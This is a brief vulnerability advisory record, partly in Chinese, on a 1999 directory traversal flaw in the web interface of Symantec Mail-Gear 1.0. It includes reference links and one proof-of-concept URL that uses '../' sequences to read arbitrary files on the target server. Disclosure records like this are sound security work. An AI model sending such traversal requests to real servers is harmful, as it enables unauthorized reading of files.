https://www.exploit-db.com/exploits/19644
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199911-078

SymantecMail-Gear1.0web接口服务器存在漏洞。远程用户可以通过..(点点)攻击阅读任意文件。

source: http://www.securityfocus.com/bid/827/info

Mail-Gear, a multi-purpose filtering email server, includes a webserver for remote administration and email retrieval. This webserver is vulnerable to the '../' directory traversal attack. By including the string '../' in the URL, remote attackers can gain read access to all files on the filesystem that the server has read access to. 


http: //target.host:8003/Display?what=../../../../../autoexec.bat
will display the server's autoexec.bat in a default NT installation.

来源:BUGTRAQ
名称:19991129SymantecMail-Gear1.0WebinterfaceServerDirectoryTraversalVulnerability
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:827
链接:http://www.securityfocus.com/bid/827
来源:OSVDB
名称:1144
链接:http://www.osvdb.org/1144